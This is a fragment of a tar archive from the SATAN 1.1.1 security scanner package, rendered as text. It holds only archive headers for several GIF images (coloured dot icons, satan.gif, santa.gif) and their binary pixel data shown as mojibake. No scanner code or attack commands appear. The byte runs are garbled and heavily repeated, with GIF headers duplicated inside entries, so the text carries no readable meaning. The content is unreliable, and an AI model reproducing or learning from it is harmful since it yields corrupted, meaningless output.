óΩ╝2@Gç"ï)¢)..;ç·Pê.MU.±█û2tD":raô.æ½0F╦g▓m9╞ï`╚..Fb.╖.64╩±┘sMrΘQù$µü▀_░╔⌐Z÷╧╤≤ê.j2.├gì.j└.-Φ.H.D║º╒Æê.¿hpl^yτiτ▌hQ|K.▓µÜÜ╞╓&#m*â\q tHÑ@»<▓%lzj┌eG≈φ¬.V┘uí╩£┤µæjoº╩.╓#Mm.─.%¼─┌.ì╘æw,ù┼X╦¼ù╠~ΦRFt4╪YF9┌:âeK.║╙.|╞α qΣj7(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ╔½ü.j─`╟∞5╩╥-@&╥.vsatan-1.1.1/html/dots/reddot.gif.................................................................... 600 . 465 . 506 . 234 5731343037 11542. ................................................................................... ................................................................................................................................................................................................................................................................. ................GIF89a....π.....Ü..Θ.Zw.1J..└>d£.)╣.5b..Z..÷.K≈.L┐hü╓.?Γë╖Ç."!∙......,..........I.╚I½╜÷ò╓ ╗L│î╩±eó"(═a£R▒(─├.┴@Ñé╨.┼──├q=.┬Iß└4".║.#`.<─.Bí┬@ │P╨ æ.l1Φ4%..;ê.MU.±█û2tD":raô.æ½0F╦g▓m9╞ï`╚..Fb.╖.64╩±┘sMrΘQù$µü▀_░╔⌐Z÷╧╤≤ê.j2.├gì.j└.-Φ.H.D║º╒Æê.¿hpl^yτiτ▌hQ|K.▓µÜÜ╞╓&#m*â\q tHÑ@»<▓%lzj┌eG≈φ¬.V┘uí╩£┤µæjoº╩.╓#Mm.─.%¼─┌.ì╘æw,ù┼X╦¼ù╠~ΦRFt4╪YF9┌:âeK.║╙.|╞α qΣj7(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ╔½ü.j─`╟∞5╩╥-@&╥.vsatan-1.1.1/html/dots/whitedot.gif.................................................................. 600 . 465 . 506 . 230 5731343037 12104. ................................................................................... ................................................................................................................................................................................................................................................................. ................GIF89a....π.....▒▒▒sssggg▐▐▐╓╓╓╬╬╬╞╞╞£££ÆÆÆΣΣΣZZZ................................................................................................................................................................................................ ................GIF89a....π.....▒▒▒sssggg▐▐▐╓╓╓╬╬╬╞╞╞£££ÆÆÆΣΣΣZZZ................................................................................................................................................................................................ ................GIF89a....π.....▒▒▒sssggg▐▐▐╓╓╓╬╬╬╞╞╞£££ÆÆÆΣΣΣZZZ................................................................................................................................................................................................ JJJΘΘΘ╜╜╜!∙......,..........E.╚I½╜⌠ÿm╬5.#:ZÑëπüxôüè┼ô(÷ï╞ê▓╘ΣC.ü▄`╫z.â║σ ô@╠.âF.Q1.σ╥FΓr.,..*fLªD..;%..;ê.MU.±█û2tD":raô.æ½0F╦g▓m9╞ï`╚..Fb.╖.64╩±┘sMrΘQù$µü▀_░╔⌐Z÷╧╤≤ê.j2.├gì.j└.-Φ.H.D║º╒Æê.¿hpl^yτiτ▌hQ|K.▓µÜÜ╞╓&#m*â\q tHÑ@»<▓%lzj┌eG≈φ¬.V┘uí╩£┤µæjoº╩.╓#Mm.─.%¼─┌.ì╘æw,ù┼X╦¼ù╠~ΦRFt4╪YF9┌:âeK.║╙.|╞α qΣj7(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ╔½ü.j─`╟∞5╩╥-@&╥.vsatan-1.1.1/html/dots/yellowdot.gif................................................................. 600 . 465 . 506 . 232 5731343037 12301. ................................................................................... ................................................................................................................................................................................................................................................................. ................GIF89a....π...................................................................................................................................................................................................................................... .Çü.°÷2IJ.╣╝.╦╬M.IF89a....π...................................................................................................................................................................................................................................... .╬╥.ßα.╟╟vjl.Æù.WY.╩╦ ££J!∙......,..........G.╚I½╜T.τî║ rîç≤eb0.ë├£Æq.è. «@9≤è3é╞.æ@ └σp▓ß0ÆΣEµ.\4.ΣGE▒░b│ kcí┼ÿ╧÷..;.;ê.MU.±█û2tD":raô.æ½0F╦g▓m9╞ï`╚..Fb.╖.64╩±┘sMrΘQù$µü▀_░╔⌐Z÷╧╤≤ê.j2.├gì.j└.-Φ.H.D║º╒Æê.¿hpl^yτiτ▌hQ|K.▓µÜÜ╞╓&#m*â\q tHÑ@»<▓%lzj┌eG≈φ¬.V┘uí╩£┤µæjoº╩.╓#Mm.─.%¼─┌.ì╘æw,ù┼X╦¼ù╠~ΦRFt4╪YF9┌:âeK.║╙.|╞α qΣj7(.ΣFaε5Z╞╢U.⌠ Z/g·╨AÑ.╪..Qtî..Θ(V<ùñèî╒╕└┐.µ@.ÉY┌Æª½╪╠.Θú.»û.╓.3â╨.σ*C½¢;.è╧┐─.`█£Z9ºô╓.Ü⌐èæ0╗.X.┤zHg¡~êJ≤╛=½╞#.⌡▓&┼XO.=gòR╗ñ.╨JW8╓\I▀╕Z╒}`6 ╔½ü.j─`╟∞5╩╥-@&╥.vsatan-1.1.1/html/images/............................................................................ 700 . 465 . 506 . 0 5742521541 10020. ................................................................................... ................................................................................................................................................................................................................................................................. ................satan-1.1.1/html/images/satan.gif................................................................... 600 . 465 . 506 . 2713 5731373361 11712. ..................................................................................... ................................................................................................................................................................................................................................................................. ..............GIF89ax.æ.≡........................................................................................................................................................................................................................................ ..............GIF89ax.æ.≡........................................................................................................................................................................................................................................ ..............GIF89ax.æ.≡........................................................................................................................................................................................................................................ !∙......,....x.æ....î┼⌐╦φ.#.@┌ï│╞t..σK'σUëN⌐x««A╛≥¼┼4▌▐è¡≈>£..q┴aΩT£±î╟ñÆyú8.╦╔.èÆ.*╫φ╢╒¡b]Rn╪"^uK╙N┘╝[iv¼|x╗╡└╟=┬╖.Hvº≈e÷v8ÿù┤ÿù┼│TçÇd.ÿ¿gHIσΦÑf.─E.¬êhê╓.D"┘∙(ú%Θ┘╫ù⌐iZ.σW*╖&τP$*½.è[X╝ùyQ7╔.ú8Z.]<|£╩!╞,ß6τòè╠çù,..^│╪¬∞I^₧s[╜j¡╗½<ê~=:.<▄.¡9ƒoJ.╕l.raó&*╪▒] ╡╕╔K░N.╓M╬P9c°naF.V¿£°j└Q╫)w±D"ôxê.D\£L.▄8╟█ÑS.╫╡ïπ..¢ï.Q╥£Y⌐!╦÷<k─╕iB.¼gÑ..¼∙─i╗d╨t&eD5*╞─Bà≥│σrVûÿYYn∞.∩ñS¬î¬~┬jδ¼▄┤êd =≈1.┌æß÷~.Φ.ε╚8Q╢.4.°/▌~σ±· )oεS▓╙l.\I'ú╤╞|╟∙}╚M.Σm0âJ╢.┌.─╞PA-..┌ƒΩ╟╙87φΩ╣6h&úæ┤6{+el╓y_°^H½/δ┴£δR4B29.úª½)m║╢°]z░ì▒┼èQ¥⌡£ΘÜk⌠.RΓΘ╙E╟┤à≈∩8j⌠δ¥{. He@╥S.m▓. Th ⌠6ùyDì≤┼a..╢╔nƒΣª╤Qçu..iß.c\}..8\\╓╣▓ZOµ.ÿôV ε░.r.f┼┼x.ß'.ΣÑ}hWëüë╒├èπ⌡e╦m.ε÷Q^wIû]= I⌡[{Jéñcô\uwÉl─aêÉ 3j(óR╡ìXα}DjfYæ[⌡Σ !NéùσæHè⌡SqzΘ╓]Q.Γ╞_.Y╛Θee╒ß╞!ïÜ.(╨5ê¥'ùTN¬Θ.A┐.╩(P.mëµsozh█áXF·òÿÇZ┼]ú:bºΓúëZQººδmσ¥S│É.Γó;┬X▀¬ƒ⌐ñ▐l..▓.ùá┤⌡òr÷= g╓úΓjQí&┼w..Ç.╪z.▒ì┬╒'p┐╬D╘=£.╩ak╦φ).d÷.B_▓$.FΦƒQ.δ¬Y╜┬Ü▐╣ª*╞,è╤"Zk£{ΩâVÜ└╞╦){ Ü.út█φ.¡ó..U╤|█h┘ÑΣΩ~+ ╜Θ╬yñG2ª:/╖£&8⌐╕≥┴A╬║Ω≈"░.¡r≡è║ó.#┼un╠∩╩.*Xà]µ.≤╡∩╥╔3╢▌^V.├.₧┌.T..|`«αε|Ω^L.L.│mα÷ñ⌐}▓∙Ωª,@╔Φríy│.zjLδi═3C╩#╒K7)▌3≈·.≡÷¥ªµ│V]K|Nσ2≤E6û╚àÑ─╕6∩.,½+╣IO╞αò¥»/9ú!8╙.é.EΩ+π.n∞ƒ─.G▓µƒ6lEα∞▒=dòcH.jeU.lµôgδ.▒╕:▒~─▐.G.7─º╟è{Σσ╗'⌠kéa.Φw└.«.[|. ë<φó│¡α▀L>.`∩+█µ,ΓvΣ⌠╢sε*..║¡╖!%█é.╗╬┌w<q·°Ln╝│Q╠f"w>µL9$A.▌*âJ.║>W.≡u.#à█─7╜.¬¡cD._. º@╖ÿâÇ▒ΩV₧"¿5...L.[...x┴█m.T.╗á÷£╫,│ì.y.q. !é╣«.î,-─ôKb.6ª▌gRoy─Ñ`ê//.è.╒*.»─╕@!6âsÑb▐.2ÿ8╚=.}Gδìº├.ñ..RA.5╥.ò|â┼(╛éï═â.╒,í..═┼J0d#ô¬e─.A╦r`....X?└ìm:M@┘╥.8┼%.Σ.Tc ═╘?1foì/▄óñ2Σ>.A1qH!B#╙ê).┌eç╕:.⌡*y╝!╪*.m.%o«P&-Üré8Qσ*{ÿIy╜. ≡╔╧,í.╔[║g h╨σ)'ΘKαò0ÿ─t%1╟x╠`.3╓░4e...;AÉ ╧,.σÇ4.Ç^'╚.÷`O╧¼╟..&╖E@Kù⌐`_i.G╩.B≥[R*D*<ÆÑFIH─..satan-1.1.1/html/images/santa.gif................................................................... 600 . 465 . 506 . 11741 5731343040 11722. ................................................... ................................................................................................................................................................................................................................................................. ................................................GIF89ay.p.≈..........................!..............)..............9.....!..!..J..R..!....!...!..!..)..Z...!!.!))!.!!!!!))!.s..1!.)!!1!.!))Σ..!)11).)))î..1)!9).!11÷..£..B).91!111119Ñ..B1.¡..B1!£..B1)19919BÑ..9 91B9)999£..B99J9!J9)Ñ..J91R9)9BB9BJBB9BBBÑ..9JJRB1RB)ZB1BJJÑ!!JJRJJJRJB¡!!ZJ1î11ZJ9cJ)BRRÑ))cJ9¡))RRJRRZRRRÑ11ZRJkR1kR9RZZkRB╡11Ñ99ZZZkZ9kZBRcckZJsZ9sZB╡99Zcc{ZB{ZJ¡BBcccRkkcckscR╜BB¡JJkkskkk¡RRΣkJcssΣkRΣkZîkR╜RR¡ZZss{sss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk {Σî÷{{ΣΣΣ╞kk╡ss£ΣcΣîîÑΣZÑΣc╡{{îîîîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ╞÷╬╓╓≈╬£╓╓╓k╡ss£ΣcΣîîÑΣZÑΣc╡{{îîîîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ╬÷╓╓▐≈╬£╓╓╓k╡ss£ΣcΣîîÑΣZÑΣc╡{{îîîîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ╬£∩╬╬╬▐▐╓╓╓k╡ss£ΣcΣîîÑΣZÑΣc╡{{îîîîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ╓£∩╬╬╬▐▐╓╓╓k╡ss£ΣcΣîîÑΣZÑΣc╡{{îîîîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ╓Ñ▐▐τ▐▐▐╬ττk╡ss£ΣcΣîîÑΣZÑΣc╡{{îîîîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ▐¡▐ττ≈▐▐╓∩∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ∩∩∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ∩∩∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ≈≈∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ≈≈∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ≈≈∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ≈≈∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ≈≈∩≈≈≈≈≈≈≈∩ττ∩τττ≈τττ∩∩∩∩∩∩∩≈τ≈≈îîî÷¡Σc╬ssΣ÷÷¡îk╡ΣΣ╬{{÷÷÷÷÷£╡îk╡÷c╡÷k╜îî╬ΣΣ╡÷s£££££Ñ╞îî╜÷÷╜£s╓îî╡££╞£{╞£sÑÑÑÑÑ¡╓÷÷Ñ¡¡╜ÑÑ╬Ñ{¡¡¡╓Ñ{Ñ╡╡╜¡¡╬¡Σ╓¡{╓¡Σ╞¡¡╡╡╜╡╡╡▐ÑÑ▐¡Σ¡╜╜▐╡Σ▐╡î╜╜╜╜╜╞τ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk !∙....╒.,....y.p.....½..H░á┴â..*\╚░í├ç.#JΣê«¥Et.3j▄╚.!╞Mxê╠ÿüτ.╞─(S¬4ê▒îîæ0g╚@ΓkÑ═¢.╤∙·≥2ªO.U┬ß.J÷σ0ù>ô┬.Rφd╤º)├╡½µG⌐╒ÿ~ÜB▌:Qj5P<z^.;úîV«h.ó.τKR.▒cq╚┼qU.¢│i╙N╡─≤*..3TΦ.¼.╟..àτ╡î╡╞╞τ╜î╞╞╬├├├∩╜î∩╜÷╜╬╬τ╜╜≈╜÷╞╬╬∩╞÷╬╬╬≈╞÷≈╞£ss╡ZZîsRk{{÷sR£kk÷sZ{{s╡cc{{{÷{Z÷{c╡kk ..Lwd.Zy╖b<.6.α..2kní.└......=║─\╣a".Ew¬ \ÑrKX.0(ì╛╕s╫+%. 38u.QA..Çê...¿└1K¿Ω÷Φnë$;.ç...J╜╦═╜╗w▄÷...kΣ.@ü..¬═c≈£#₧╫W]..⌠╜╛.ε┬▐i╢1.X.ë<P7Æu.⌠r▀ü..ô..-.α▀...ôa╥$hßüW..aC╛└τù.6\(b}╓═│ßB.J8Æ.±îΦ"w║.á╦8'.Σ╬.*─$├./v╟─ê╓=Xπ@Φ.ÆúL2d╙#w.<s!...YÉ+.─⌡╥Æ▄┼.Ç..fFú÷..ëΣ+Xr.Ç"mΣwá..Σ.&:F.Θé..▓ú.n╓╠│.w╔.2╔<.Çgƒ.Wÿ(Ñ/UZy╚à~v.L.6. ├¥..QA..Çê...¿└1K¿Ω÷Φnë$;.ç...J╜╦═╜╗w▄÷...kΣ.@ü..¬═c≈£#₧╫W]..⌠╜╛.ε┬▐i╢1.X.ë<P7Æu.⌠r▀ü..ô..-.α▀...ôa╥$hßüW..aC╛└τù.6\(b}╓═│ßB.J8Æ.±îΦ"w║.á╦8'.Σ╬.*─$├./v╟─ê╓=Xπ@Φ.ÆúL2d╙#w.<s!...YÉ+.─⌡╥Æ▄┼.Ç..fFú÷..ëΣ+Xr.Ç"mΣwá..Σ.&:F.Θé..▓ú.n╓╠│.w╔.2╔<.Çgƒ.Wÿ(Ñ/UZy╚à~v.L.6. ê≡╧8C..@7⌡i╓ ÿ)╩┘▌8{╓gâ.yd2..W.3╧=.6d≥..╕A≡O..╘'┬.∞╒ê─%b╛DGw.$≤],└.╨╦.cÇ.└.fP`B$╚Σ!┬?▒┤±...|W .í⌠ZúÿH₧├.0.╠├]&┼σ ┼╗╣82E+▐Xc═5ndv┬..d@└..─Γ]fNê.!:_É+..▌eBF.╣e╢.%▄\c═4╤d∞╠2╞.╙╠4═8ô╦.ªΣ.@q▓vw@f..ôa╥$hßüW..aC╛└τù.6\(b}╓═│ßB.J8Æ.±îΦ"w║.á╦8'.Σ╬.*─$├./v╟─ê╓=Xπ@Φ.ÆúL2d╙#w.<s!...YÉ+.─⌡╥Æ▄┼.Ç..fFú÷..ëΣ+Xr.Ç"mΣwá..Σ.&:F.Θé..▓ú.n╓╠│.w╔.2╔<.Çgƒ.Wÿ(Ñ/UZy╚à~v.L.6. . ╣2)ô█8▌.áA2-h.└.▐x3ì3..-t╨╦Σ£±5\..Ç║▄=ô╓÷0╦÷█>╢╢└─.7.P╦5╙|2J╧▐p≤≤╨d/3ì9┐d. w╕Æß+"0╦áInèp·╠.-╝`╢.3╫╚┴Df..áD0@ô▌▒3╙îrσ..h╞⌠?╓.║a╘2p.╦.╣aó═╞╙└p.4╣╔S─.E..t. Tê█8.ñÆ[f'ó├F▄ssg..d.gì1╤╘Æ┴w╗PR°╨╤0 ïw≤.0╬?Z.á.Σß╕.⌡....╠.╦╦8'.Σ╬.*─$├./v╟─ê╓=Xπ@Φ.ÆúL2d╙#w.<s!...YÉ+.─⌡╥Æ▄┼.Ç..fFú÷..ëΣ+Xr.Ç"mΣwá..Σ.&:F.Θé..▓ú.n╓╠│.w╔.2╔<.Çgƒ.Wÿ(Ñ/UZy╚à~v.L.6. c╧8≤p0 ╟.¿é..V@.Ç4⌡H┴M3BG├ì9?Σ╢.wô╚ HfÆ?w.σ}αô┘..H...æ k8├.Npé.£α.'8┴.Npé.£α.'8┴.Npé.£α.'8┴.rα..£α...Γ.d╚î".â─8),.ß.┬..qÇ..â.u╚î.£└&═°≡ç.@.".£αΣ..c...D{┬▒..)Φ.ì.┴?σáê<d(3NΦí.╖╕┼-░)7.╨┼ª'â|..48Bf÷æîR°╨.ZΣ".£Éë;l...p.¢r..]┤...├G."α─;.c.╓yA.4πΣ8.æ.Fú÷..ëΣ+Xr.Ç"mΣwá..Σ.&:F.Θé..▓ú.n╓╠│.w╔.2╔<.Çgƒ.Wÿ(Ñ/UZy╚à~v.L.6. pé.á!._d┬.─╘î.╪Σ¢I.áe\Aç._..Q└`.Bê..╨╨â(╘ 3N¿F&}ÿëXî╨.µêB-2æëL.q.N`╙?&.Ç!¿..Uí.*░┴îN╚ü.j°Σ.─q sDü.╓.D&f.ÇP╚╩.z°.7j@.08!.╓╨E,\≈┼X8üM└.Ç.╪ôî/Iµ.╙.ô╔?ñ..gVé.╡ê┬5xgσ;$.."êΣ.2æ..Ω".Cÿç="░éi\..░pâ!£.ê=Σí Np┬1╪⌠.6┘C .╚.(çB%2≥B..p┬%╨0ì.¿├.╝¢╞4╝....á.X.Ç.2æ.`Φ".πá╞>.░.o n.╡≡F.Xáσ╠.┬ç.°Gσ÷!É╠ΣaÑ+AGK≤∙┼w\ß.╨¿Ç7.Ç..0é.òXàN{.D@─"."╚..|ª1gDCºîPC óαC.L...╚+....EÇ.%ßáEó$$.s...╔°..Ü±ë ╘`..°..2÷ëî.é.BTG╧ ┴àZ.Cd.¢.╞╜«. ÷E#..°Gâ£.ï....p┬c9▓┐|╩ .«J!n.íΣoÉâ..╚L+ªa..\πcq.┬"}¿.HDßóσê.∩Æ`.N,âcB3..p≤úy╪α.W. :BE9xtg.)d@%nü.+Σì░▐≡X4«ß s.8l▐...╝±ïk.m.ª 